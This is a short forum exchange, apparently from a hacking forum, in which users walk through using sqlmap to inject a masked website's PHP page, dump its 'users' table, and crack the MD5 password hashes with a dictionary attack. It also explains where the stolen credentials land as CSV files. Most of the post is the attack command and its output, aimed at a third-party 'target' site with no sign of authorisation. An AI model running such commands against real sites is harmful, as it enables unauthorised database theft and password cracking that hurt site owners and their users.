03-19-2012, 08:58 PM
(03-14-2012, 11:39 AM)xombix Wrote: Bro, I'd like to ask: when I use it, mine asks for confirmation to decrypt, and then this is shown on the screen
python sqlmap.py -u http://www.xxxx.com/features/shows.php?user=11 -D xxxx -T users --dump
and it immediately comes out like this:
Quote:[10:06:10] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'user_actkey'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:20] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[10:06:26] [INFO] using default dictionary
[10:06:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:06:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
Does that mean sqlmap is decrypting, bro?
And where can I see the result?
For example, like this:
username | password
admin | 098gf9807450459445fgnjf873f(admin)
That means admin is the cracked value of the MD5.
Then it will be saved in .csv format in the folder.
For example, if the URL is www.target.com
then
sqlmap > output> www.target.com> dump>tbl_user.csv
Which one is the correct one to inject, bro fake666?